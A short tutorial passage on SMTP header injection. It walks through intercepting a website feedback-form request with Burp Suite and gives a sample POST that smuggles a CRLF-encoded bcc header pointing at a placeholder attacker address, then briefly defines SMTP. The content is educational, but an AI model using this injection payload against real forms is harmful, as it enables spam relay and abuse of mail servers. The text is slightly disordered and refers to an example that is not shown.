Steps Performed to perform SMTP Injection attack
- Step 1: Enter details in the feedback form as shown in the SMTP example above.
- Step 2: Use any interception tool such as Burp Suite to intercept the request you make.
- Step 3: Inject malicious input into this capture request.
- step 4: Now send the infected email request as shown below.
POST feedback.php HTTP/1.1 Host: w3wiki.com Content-Length: 70 From=gfglover@gmail.com%0d%0a bcc:hackername%40hacker.com & Subject=Site+ feedback & Message=love+w3wiki+3000
SMTP Injection
SMTP stands for Simple Mail Transfer Protocol. It is an application layer protocol that handles the sending, receiving, and forwarding of emails on the server. A client that wants to send an email first opens a TCP connection to the SMTP server and sends an email over that connection.